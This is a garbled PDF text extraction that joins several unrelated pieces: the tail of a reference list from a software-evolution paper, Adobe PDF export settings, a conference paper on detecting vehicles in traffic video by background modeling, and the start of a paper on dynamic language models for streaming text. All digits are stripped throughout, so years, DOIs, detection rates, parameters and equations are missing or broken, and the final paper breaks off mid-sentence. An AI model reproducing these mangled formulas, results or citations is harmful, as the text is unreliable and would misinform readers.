inter-dependencies in a software ecosystem: the case of apache. in: proceedings of the th ieee international conference on software maintenance, icsm ’ . washington: ieee computer society, – . bevan j, whitehead ej, kim s, godfrey m. . facilitating software evolution research with kenyon. in: proceedings of the th european software engineering conference held jointly with th acm sigsoft international symposium on foundations of software engineering, esec/fse- . new york: association for computing machinery, – . breivold hp, crnkovic i, larsson m. . a systematic review of software architecture evolution research. information and software technology ( ): – doi . /j.infsof. . . . buse rp, weimer wr. . a metric for software readability. in: proceedings of the international symposium on software testing and analysis, issta ’ . new york: acm, – . canfora g, cerulo l, penta md. . identifying changed source code lines from version repositories. in: proceedings of the th international workshop on mining software repositories, msr ’ . washington, d.c: ieee computer society, . claes m, mens t, di cosmo r, vouillon j. . a historical analysis of debian package incompatibilities. in: proceedings of the th working conference on mining software repositories, msr ’ . piscataway: ieee press, – . cotroneo d, natella r, pietrantuono r. . predicting aging-related bugs using software complexity metrics. performance evaluation ( ): – doi . /j.peva. . . . davidson-pilon c, kalderstam j, jacobson n, sean r, kuhn b, zivich p, williamson m, abdeali jk, datta d, fiore-gartland d, parij a, wilson a, gabriel d, moneda l, moncada-torres a, stark k, gadgil h, jona s, besson k, peña ms, anton s, klintberg a, growth j, noorbakhsh j, begun m, kumar r, hussey s, golland d, jlim . . camdavidsonpilon/lifelines: v . . . doi . /zenodo. . kaplan el, meier p. . nonparametric estimation from incomplete observations. journal of the american statistical association ( ): – doi . / . . . eick sg, graves tl, karr af, marron js, mockus a. . does code decay? assessing the evidence from change management data. ieee transactions on software engineering ( ): – doi . / . . elandt-johnson rc, johnson nl. . survival models and data analysis. hoboken: wiley. falleri j-r, morandat f, blanc x, martinez m, monperrus m. . fine-grained and accurate source code differencing. in: proceedings of the th acm/ieee international conference on automated software engineering, ase ’ , new york: acm, – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /j.peva. . . http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . / . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fluri b, wuersch m, pinzger m, gall h. . change distilling: tree differencing for fine-grained source code change extraction. ieee transactions on software engineering ( ): – doi . /tse. . . fowler m. . refactoring: improving the design of existing code. boston: addison-wesley. gall h, jazayeri m, klosch rr, trausmuth g. . software evolution observations based on product release history. in: proceedings international conference on software maintenance. – . gamalielsson j, lundell b. . sustainability of open source software communities beyond a fork: how and why has the libreoffice project evolved? journal of systems and software : – doi . /j.jss. . . . german dm, adams b, hassan ae. . continuously mining distributed version control systems: an empirical study of how linux uses git. empirical software engineering ( ): – doi . /s - - - . german dm, adams b, stewart k. . cregit: token-level blame information in git version control repositories. empirical software engineering : – . giger e, pinzger m, gall hc. . comparing fine-grained source code changes and code churn for bug prediction. in: proceedings of the th working conference on mining software repositories, msr ’ . new york: acm, – . godfrey mw, tu q. . evolution in open source software: a case study. in: proceedings of the international conference on software maintenance, icsm ’ . piscataway: ieee, – . goeminne m, mens t. . towards a survival analysis of database framework usage in java projects. in: proceedings of the st ieee international conference on software maintenance and evolution. – . gonzález-barahona jm, robles g, herraiz i, ortega f. . studying the laws of software evolution in a long-lived floss project. journal of software: evolution and process ( ): – doi . /smr. . gonzález-barahona jm, robles g, michlmayr m, amor jj, german dm. . macro-level software evolution: a case study of a large software compilation. empirical software engineering ( ): – doi . /s - - -x. gordon ad, henzinger ta, nori av, rajamani sk. . probabilistic programming. in: proceedings of the on future of software engineering, fose . new york: acm, – . goues c, forrest s, weimer w. . current challenges in automatic software repair. software quality journal ( ): – doi . /s - - - . gousios g, kalliamvakou e, spinellis d. . measuring developer contribution from software repository data. in: proceedings of the international working conference on mining software repositories, msr ’ . new york: acm, – . gousios g, spinellis d. . ghtorrent: github’s data from a firehose. in: lanza m, penta md, xie t, eds. th ieee working conference on mining software repositories (msr). piscataway: ieee, – . gousios g, spinellis d. . mining software engineering data from github. in: proceedings of the th international conference on software engineering companion, icse-c ’ . piscataway: ieee press, – . hata h, mizuno o, kikuno t. . historage: fine-grained version control system for java. in: proceedings of the th international workshop on principles of software evolution and the th annual ercim workshop on software evolution, iwpse-evol ’ . new york: association for computing machinery, – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /smr. http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hatton l, spinellis d, van genuchten m. . the long-term growth rate of evolving software: empirical results and implications. journal of software: evolution and process ( ):e . heckel p. . a technique for isolating differences between files. communications of the acm ( ): – doi . / . . herraiz i, gonzález-barahona jm, robles g. . towards a theoretical model for software growth. in: proceedings of the th international workshop on mining software repositories, msr ’ . washington, dc: ieee computer society, . herraiz i, rodriguez d, robles g, gonzález-barahona jm. . the evolution of the laws of software evolution: a discussion based on a systematic literature review. acm computing surveys ( ): : – : doi . / . . humphrey ws. . managing the software process. reading: addison-wesley. ince d, hatton l, graham-cumming j. . the case for open program code. nature ( ): – doi . /nature . jiang s, armaly a, mcmillan c. . automatically generating commit messages from diffs using neural machine translation. in: proceedings of the nd ieee/acm international conference on automated software engineering, ase . piscataway: ieee press, – . kan sh. . metrics and models in software quality engineering. second edition. boston: addison-wesley longman publishing co., inc. karus s. . automatic means of identifying evolutionary events in software development. in: proceedings of the th ieee international conference on software maintenance, icsm ’ . piscataway: ieee, – . karus s, dumas m. . code churn estimation using organisational and code metrics: an experimental comparison. information and software technology ( ): – doi . /j.infsof. . . . kechagia m, devroey x, panichella a, gousios g, van deursen a. . effective and efficient api misuse detection via exception propagation and search-based testing. in: proceedings of the th acm sigsoft international symposium on software testing and analysis, issta . new york: acm, – . kim m, notkin d. . program element matching for multi-version program analyses. in: proceedings of the international workshop on mining software repositories, msr ’ . new york: acm, – . kirkwood tb, austad sn. . why do we age? nature ( ): – doi . / . klein jp, moeschberger ml. . survival analysis: techniques for censored and truncated data. second edition. springer. kruchten p, nord rl, ozkaya i. . technical debt: from metaphor to theory and practice. ieee software ( ): – doi . /ms. . . lehman mm. . programs, cities, students—limits to growth? in: gries d, ed. programming methodology: a collection of articles by members of ifip wg . . new york: springer, – . lehman mm. . programs, life cycles, and laws of software evolution. proceedings of the ieee ( ): – doi . /proc. . . li x, li yf, xie m, ng sh. . reliability analysis and optimal version-updating for open source software. information and software technology ( ): – doi . /j.infsof. . . . lind rk, vairavan k. . an experimental investigation of software metrics and their relationship to software development effort. ieee transanctions on software engineering ( ): – doi . / . . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /nature http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . / http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /proc. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ løhre e, jørgensen m. . numerical anchors and their strong effects on software development effort estimates. journal of systems and software : – doi . /j.jss. . . . mäntylä mv, lassenius c. . subjective evaluation of software evolvability using code smells: an empirical study. empirical software engineering ( ): – . martinez m, weimer w, monperrus m. . do the fix ingredients already exist? an empirical inquiry into the redundancy assumptions of program repair approaches. in: companion proceedings of the th international conference on software engineering, icse companion . new york: association for computing machinery, – . munaiah n, kroh s, cabrey c, nagappan m. . curating github for engineered software projects. empirical software engineering ( ): – doi . /s - - - . myers ew. . an o(nd) difference algorithm and its variations. algorithmica ( – ): – doi . /bf . nguyen ha, nguyen at, nguyen tt, nguyen tn, rajan h. . a study of repetitiveness of code changes in software evolution. in: th ieee/acm international conference on automated software engineering (ase). – . nguyen hv, nguyen ha, nguyen tt, nguyen at, nguyen tn. . detection of embedded code smells in dynamic web applications. in: proceedings of the th ieee/acm international conference on automated software engineering, ase . new york: association for computing machinery, – . nugroho ys, hata h, matsumoto k. . how different are different diff algorithms in git? empirical software engineering ( ): – doi . /s - - -z. ozment a, schechter se. . milk or wine: does software security improve with age? in: proceedings of the th conference on usenix security symposium. berkeley: usenix association. padgett wj. . weibull distribution. in: lovric m, ed. international encyclopedia of statistical science. berlin: springer, – . parnas dl. . software aging. in: proceedings of the th international conference on software engineering, icse ’ . los alamitos: ieee computer society press, – . penta md, cerulo l, aversano l. . the life and death of statically detected vulnerabilities: an empirical study. information and software technology ( ): – doi . /j.infsof. . . . petke j, haraldsson so, harman m, langdon wb, white dr, woodward jr. . genetic improvement of software: a comprehensive survey. ieee transactions on evolutionary computation ( ): – doi . /tevc. . . petke j, harman m, langdon wb, weimer w. . using genetic improvement and code transplants to specialise a c++ program to a problem class. in: nicolau m, krawiec k, heywood mi, castelli m, garcía-sánchez p, merelo jj, rivas santos vm, sim k, eds. genetic programming. berlin: springer, – . qin f, tucek j, sundaresan j, zhou y. . rx: treating bugs as allergies—a safe method to survive software failures. in: proceedings of the th acm symposium on operating systems principles, sosp ’ . new york: acm, – . robillard mp, murphy gc. . representing concerns in source code. acm transactions on software engineering and methodology ( ): doi . / . . robles g, amor jj, gonzalez-barahona jm, herraiz i. . evolution and growth in large libre software projects. in: eighth international workshop on principles of software evolution (iwpse’ ). – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /bf http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /tevc. . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ robles g, gonzález-barahona jm, herraiz i. . an empirical approach to software archaeology. in: poster proceedings of the international conference on software maintenance, icsm ’ . – . rodríguez d, sicilia m, garcÃa e, harrison r. . empirical findings on team size and productivity in software development. journal of systems and software ( ): – doi . /j.jss. . . . salfner f, lenk m, malek m. . a survey of online failure prediction methods. acm computing surveys ( ): – doi . / . . samoladas i, angelis l, stamelos i. . survival analysis on the duration of open source projects. information and software technology ( ): – doi . /j.infsof. . . . scanniello g. . source code survival with the kaplan meier. in: proceedings of the th ieee international conference on software maintenance, icsm ’ . – . sentas p, angelis l, stamelos i. . a statistical framework for analyzing the duration of software projects. empirical software engineering ( ): – doi . /s - - - . servant f, jones ja. . fuzzy fine-grained code-history analysis. in: proceedings of the th international conference on software engineering, icse ’ . los alamitos: ieee computer society press. sharma t, fragkoulis m, spinellis d. . does your configuration code smell? in: ieee/acm th working conference on mining software repositories (msr). los alamitos: ieee computer society, – . shin y, meneely a, williams l, osborne ja. . evaluating complexity, code churn, and developer activity metrics as indicators of software vulnerabilities. ieee transactions on software engineering ( ): – doi . /tse. . . spinellis d. a. how can i obtain with git log a series of patches that can be auto-applied? available at http://www.webcitation.org/ jyf ue . spinellis d. b. a repository of unix history and evolution. empirical software engineering : – . spinellis d. . dspinellis/tokenizer: version . . available at https://github.com/dspinellis/ tokenizer/. spinellis d, kotti z, mockus a. . a dataset for github repository deduplication. in: th international conference on mining software repositories, msr ’ . new york: association for computing machinery, – . stamelos i, angelis l, oikonomou a, bleris gl. . code quality analysis in open source software development. information systems journal ( ): – doi . /j. - . . .x. vallée-rai r, co p, gagnon e, hendren l, lam p, sundaresan v. . soot: a java bytecode optimization framework. in: cascon first decade high impact papers, cascon ’ . riverton: ibm corp, – . van genuchten m, hatton l. . metrics with impact. ieee software ( ): – doi . /ms. . . voinea l, telea a, van wijk jj. . cvsscan: visualization of code evolution. in: proceedings of the acm symposium on software visualization, softvis– . new york: association for computing machinery, – . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tse. . http://www.webcitation.org/ jyf ue https://github.com/dspinellis/tokenizer/ https://github.com/dspinellis/tokenizer/ http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /ms. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ white m, vendome c, linares-vásquez m, poshyvanyk d. . toward deep learning software repositories. in: proceedings of the th working conference on mining software repositories, msr ’ . piscataway: ieee press, – . zhang h. . an investigation of the relationships between lines of code and defects. in: proceedings of the th ieee international conference on software maintenance, icsm ’ . – . zheng x, zeng d, li h, wang f. . analyzing open-source software systems as complex networks. physica a: statistical mechanics and its applications ( ): – doi . /j.physa. . . . zimmermann t. . fine-grained processing of cvs archives with apfel. in: proceedings of the oopsla workshop on eclipse technology exchange, eclipse ’ . new york: association for computing machinery, – . zimmermann t, kim s, zeller a, whitehead ej jr. . mining version archives for co-changed lines. in: proceedings of the international workshop on mining software repositories, msr ’ . new york: acm, – . zimmermann t, zeller a, weissgerber p, diehl s. . mining version histories to guide software changes. ieee transactions on software engineering ( ): – doi . /tse. . . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . /tse. . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. software evolution: the lifetime of fine-grained elements introduction methods results and discussion threats to validity related work conclusions and implications flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international conference on sensor network and computer engineering (icsnce ) research on vehicle detection method based on background modeling zhichao lian school of computer science and engineering xi’an technological university xi’an , china e-mail: @qq.com zhongsheng wang school of computer science and engineering xi’an technological university xi’an , china e-mail: wangzhongsheng@xatu.edu.cn abstract—this paper mainly studies the background difference method in the field of intelligent traffic, proposes a background modeling method base on frame difference, and compares it with the statistical average background model and gaussian distribution background modeling method. vehicle contour obtained by the morphological method. finally, experiments were carried out on normal road traffic surveillance videos, the effective detection rate used in this paper reaches . %, which has a certain degree of application. the algorithm model need to be further tested in more complex weather and different road conditions. keywords-vehicle detection; background modeling; inter-frame difference; morphological method i. introduction in practical applications, a vehicle detection method with fast response, high accuracy, and good adaptability becomes a key part of intelligent traffic detection management. dealing with moving object in video is affected by many complicated conditions. commonly used methods for detecting three kinds of moving vehicles include: difference method, optical flow method, and background difference method. currently, the difference method includes the inter-frame difference method and the time difference method. the inter-frame difference detection method detectionspeed faster and the operation algorithm is simple, and can be detected under a scene with high real-time requirements. the time difference method is suitable for dynamically changing scenes and does not apply to completely segmenting moving objects. the optical flow method is poor in the context of real-time and practical, and it is difficult to meet the requirements for teal-time detection of moving vehicles. the background difference method has a good result on the speed and detection effect when the performance of the camera is relatively stable. the background difference method focuses on how to set up the background and dynamically update the system in real time. this article uses the background difference method. ii. commonly used background modeling update models in the monitoring applications, the background difference method needs to establish a background reference frame. establishing an accurate and robust background model is the key to the system, the accuracy of the frame directly affects the output. the commonly used background models are the statistical average method and the gaussian distribution background model. a. statistical average method background model the statistical average method, also called the mean method, is essentially a statistical filter idea. in a period of time, the collected images are added together, and the average value is taken as the reference background model. it is to obtain the gray average value ofn frames of images in the sequence image as the estimated value of the background image to weaken the interference of the moving object to the background. the specific calculation formula is shown in k ( ... ) k k k k n avg f f f f n           avgk is the background model established for the acquisition of the frame k image system; n is the average number of frames; fk,fk- , ...,fk-n+ are the continuous sequences frame. the statistical average method is simple and fast, but if easily causes noise accumulation and mixing. this method is more suitable for a small number of continuous motion objects in the scene, and the background is visible in the most of the time. while there are a large number of moving objects, especially when they are moving slowly, there will be a large deviation in the background of this situation. b. gaussian distribute background model the gaussian distribution background model was first proposed by n. friedman et.al and is divided into background models with single gaussian distribution and mixed gaussian distribution. the single gaussian model method regard the change in the gray value of each pixel in the background image as a gaussian random process, and establishes a gaussian model for each pixel in the image, which is achieved by continuously updating the gaussian model background image. the mixed gaussian model uses k (basically ~ ) gaussian models to characterize the features of each pixel in the image. after the new image is acquired, the mixed gaussian model is updated. each pixel in current image is mixed with a gaussian mixture model. matching to determine the pixel belongs to a background point or a front sight. the section focuses on the hybrid gaussian background modeling method. this modeling method uses the statistical international conference on sensor network and computer engineering (icsnce ) information such as the probability density of a large number of sample values for a long time to represent the background. use the statistical difference (such as σ principle) to judge the target pixel. this method can model complex dynamic backgrounds with a large amount of computation. suppose that any pixel (x,y) in the background obeys a gaussian model composed of k gaussian distributions, as shown in follow. , , , , , , ( ) ( , , ) k x y j x y x y j x y j j p i i        η(i(x, y), μ(x, y), σ(x,y,j)) means that the j-th gaussian probability density, means value isμ(x,y,j), the variance isσ(x,y,j). and the ωjis the weight of the j-th gaussian distribution. the pixel values observed at the current moment are compared with the current k gaussian distribution functions in descending order of weights to obtain the best match. if there is no match, the pixel is a foreground spot.otherwise it is a background point. the gaussian distribution background model has a large amount of calculation, many storage parameters, and takes a long time, which is not conducive to practical application. iii. improved background modeling method this paper proposes an adaptive background update model based on the inter-frame difference method. this method uses the background of the current frame and the background of the previous frame in the video sequence to perform weighted averaging to update the background. the specific methods are as shown in formulas ( ) and ( ) as shown. ( , , ) | ( , , ) ( , , ) |diff x y t i x y t b x y t   ( , , ) ( , , ) h diff x y t t bom x y t otherwise      i(x, y, t) and b(x, y, t) are the current frame containing the moving object at t time and the updated current background image; th is the threshold and the maximum peak right fade in the difference image histogram is used,and the gray level corresponding to / of the maximum peak. using equation ( ) to obtain the motion template stencil(x, y, t) at time t from two adjacent spaced images, it is used as a target factor to determine which pixels in the current frame are used to update the current background. use the formula ( ) to obtain the instantaneous background and update the background using the weighted average of the instantaneous background and the current background, as shown in equation ( ). ( , , ) ( , , ) & ( , , )stencil x y t bom x y t bom x y t   ( , , ) ( , , ) ( , , ) ( , , ) ( , , ) temp b x y t stencil x y t b x y t i x y t stencil x y t       ( , , ) α ( , , ) ( α) ( , , ) temp b x y t b x y t b x y t     among them, in order to update the coefficient, theαvalue has a positive correlation with the update speed. the larger theαvalue is, the faster the update speed is, and the change of the external light can be captured in time so that the current background is closer to the external condition of the current frame. the smaller the value is, the slower the update rate will be, and the current background acquired will have some deviation. after the background image is extracted, the current motion area is segmented using the background difference method. using the threshold parameter in the expression ( ), the image is binaries and segmented to obtain the foreground binary image. ( , , ) ( , , ) diff x y t threshold d x y t other      threshold in the formula should be properly selected, through the experimental results to filter the residual background. iv. experimental testing according to the flow of the vehicle detection algorithm, the original video frame→background update and extraction algorithm→motion region segmentation→frame image conversion to grayscale image→binary processing→morphological processing→obtain the detection result, and complete detection test. a. comparison of experimental results by using the statistical average method, the background of the mixture gaussian model and the method proposed in this paper, the background model is obtained by modeling the background image of a video of a traffic video surveillance video. the video of this video screen is * , the frequency is fps, and the time length is seconds.the experimental results are shown are shown in fig. below. international conference on sensor network and computer engineering (icsnce ) (a)original image frame the resulting background frame image (b- )statistical average method (c- )mixed gaussian method (d- )this article's algorithm background and frame image difference processing (b- )statistical average method (c- )mixed gaussian method (d- )this article's algorithm binary operation (b- )statistical average method (c- )mixed gaussian method (d- )this article's algorithm open operation (b- )statistical average method (c- )mixed gaussian method (d- )this article's algorithm close operation (b- )statistical average method (c- )mixed gaussian method (d- )this article's algorithm figure . comparison of experimental results with three methods international conference on sensor network and computer engineering (icsnce ) it can be seen that in the background frame extraction process, the average statistical method extracts the background [fig. (b- )] and the blurred background is affected by the camera shake of the video camera, and the effect is worst. the parameters of the mixed gaussian model are set as follows: the number of pixel models is , the initial variance is , and the learning rate of model weights is α = . , t = . ; the resulting background [fig. (c- )] is clearer, but the background extracted at the lower left corner of the screen is still somewhat blurred; the corresponding parameter setting of this algorithm is: th = , α = . , threshold = . the background [fig. (d- )] obtained by the method proposed in this paper is of good quality and closer to the real background. finally, after the difference, binary processing, and morphological processing, the image is finally obtained. the statistical mean method [fig. (b- )] is noisy, and the extraction result is not clear. the result graph obtained by using the gaussian method [fig. (c- )] works well, but there is still noise. the result graph obtained by using this algorithm [fig. (c- )] has the best effect, the noise is very small, the extracted vehicle is clearer and the connectivity is better. b. comparison of algorithm performance the final conclusion of the comparison experiment is not only drawn from the experimental results, but also from the performance side. table compares the performance ofthe three methods, including the time used for the entire inspection process, the memory footprint, and the cpu usage. it can be seen that the algorithm proposed in this paper compared with the other two methods, it consumes less time, consumes less memory, and has a small cpu occupancy rate. tablei comparison of performance of three modeling methods background model time-consuming (seconds) average memory size (mb) average cpu usage statistical average % gaussian distribution % method of this article % v. conclusion this dissertation focuses on the vehicle detection method based on background difference in the intelligent traffic field, and proposes a background modeling method based on the adaptive difference method between frames. design experiments were compared with commonly used averaging methods and gaussian distribution model methodsto compare the background images obtained by the three modeling methods. at the same time, the running performance of the algorithm is analyzed from the aspects of time-consuming, memory occupancy and cpu occupancy, which verifies that the vehicle detection algorithm proposed in this paper can extract the background more accurately. the morphological method is used to process the differential binary image to eliminate noise, fill in voids, etc. to complete the detection step. experiments prove the effectiveness and real-time performance of the algorithm for video-based motion vehicle detection. however, the effect of this algorithm in complex weather conditions and complex road conditions needs to be further improved. references [ ] ma junqiang. research on the detection and tracking technology of sports vehicles based on video [d]. beijing university of technology, . [ ] yu jie, li xiaojing. moving object detection based on mean background and three framedifference[j]. journal of shaanxi university of science and technology, ( ). [ ] zhou mingjiang, wang jiwu. research on the detection and tracking method of moving vehicles in video sequences[j]. science and technology economic market, ( ): - . [ ] fan wenjie, zhang li. an improved method of moving vehicle detection based on background difference algorithm [j]. journal of chengdu university of information technology, , ( ): - . [ ] huang lei, yu manman. research on moving object detection based on background difference [j]. software herald, ( ): - . [ ] lu xixin. detection of moving objects based on gaussian mixture model and three-frame difference method[d]. xi'an university of technology, . [ ] federal highway administration, department of transportation, highway performance monitoring system reassessment, final report, fhwa-pl- - , : - [ ] jean serra.introduction to mathematical morphology.computer vision, graphicsand image processing, , ( ): - [ ] yananakak.effects of misdate smith predictor on stability in system with time-delay.automatically, , ( ): - . [ ] cheung s, kamath c. robust background subtraction with foreground validation for urban traffic video[j]. eurasip journal on applied signal processing, , : - . dynamic language models for streaming text dani yogatama∗ chong wang∗ bryan r. routledge† noah a. smith∗ eric p. xing∗ ∗school of computer science †tepper school of business carnegie mellon university pittsburgh, pa , usa ∗{dyogatama,chongw,nasmith,epxing}@cs.cmu.edu, †routledge@cmu.edu abstract we present a probabilistic language model that captures temporal dynamics and conditions on arbitrary non-linguistic context features. these context features serve as important indicators of language changes that are otherwise difficult to capture using text data by itself. we learn our model in an efficient online fashion that is scalable for large, streaming data. with five streaming datasets from two different genres— economics news articles and social media—we evaluate our model on the task of sequential language modeling. our model consistently outperforms competing models. introduction language models are a key component in many nlp applications, such as machine translation and ex- ploratory corpus analysis. language models are typi- cally assumed to be static—the word-given-context distributions do not change over time. examples include n-gram models (jelinek, ) and proba- bilistic topic models like latent dirichlet allocation (blei et al., ); we use the term “language model” to refer broadly to probabilistic models of text. recently, streaming datasets (e.g., social media) have attracted much interest in nlp. since such data evolve rapidly based on events in the real world, as- suming a static language model becomes unrealistic. in general, more data is seen as better, but treating all past data equally runs the risk of distracting a model with irrelevant evidence. on the other hand, cau- tiously using only the most recent data risks overfit- ting to short-term trends and missing important time- insensitive effects (blei and lafferty, ; wang et al., ). therefore, in this paper, we take steps toward methods for capturing long-range temporal dynamics in language use. our model also exploits observable context vari- ables to capture temporal variation that is otherwise difficult to capture using only text. specifically for the applications we consider, we use stock market data as exogenous evidence on which the language model depends. for example, when an important company’s price moves suddenly, the language model should be based not on the very recent history, but should be similar to the language model for a day when a similar change happened, since people are likely to say similar things (either about that com- pany, or about conditions relevant to the change). non-linguistic contexts such as stock price changes provide useful auxiliary information that might indi- cate the similarity of language models across differ- ent timesteps. we also turn to a fully online learning framework (cesa-bianchi and lugosi, ) to deal with non- stationarity and dynamics in the data that necessitate adaptation of the model to data in real time. in on- line learning, streaming examples are processed only when they arrive. online learning also eliminates the need to store large amounts of data in memory. strictly speaking, online learning is distinct from stochastic learning, which for language models built on massive datasets has been explored by hoffman et al. ( ) and wang et al. ( ). those tech- niques are still for static modeling. language model- ing for streaming datasets in the context of machine translation was considered by levenberg and os- borne ( ) and levenberg et al. ( ). goyal et al. ( ) introduced a streaming algorithm for large scale language modeling by approximating n- gram frequency 